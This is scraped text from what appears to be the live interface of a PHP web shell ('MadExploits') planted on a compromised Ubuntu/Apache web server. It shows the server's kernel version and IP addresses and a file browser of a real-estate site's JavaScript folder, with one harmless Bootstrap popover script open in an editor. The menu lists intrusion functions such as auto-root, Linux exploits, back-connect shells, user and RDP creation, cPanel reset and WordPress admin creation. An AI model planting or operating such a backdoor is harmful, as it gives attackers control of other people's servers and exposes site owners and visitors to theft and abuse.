Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.231.18
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
realestate /
source /
public /
assets /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
config.js
800
B
-rwxr-xr-x
custom.js
3.1
KB
-rwxr-xr-x
dashboards-analytics.js
9.4
KB
-rwxr-xr-x
extended-ui-perfect-scrollbar....
1.06
KB
-rwxr-xr-x
form-basic-inputs.js
188
B
-rwxr-xr-x
main.js
5.28
KB
-rwxr-xr-x
pages-account-settings-account...
852
B
-rwxr-xr-x
ui-modals.js
1.04
KB
-rwxr-xr-x
ui-popover.js
443
B
-rwxr-xr-x
ui-toasts.js
1.46
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ui-popover.js
// /** // * UI Tooltips & Popovers // */ 'use strict'; (function () { const popoverTriggerList = [].slice.call(document.querySelectorAll('[data-bs-toggle="popover"]')); const popoverList = popoverTriggerList.map(function (popoverTriggerEl) { // added { html: true, sanitize: false } option to render button in content area of popover return new bootstrap.Popover(popoverTriggerEl, { html: true, sanitize: false }); }); })();
Close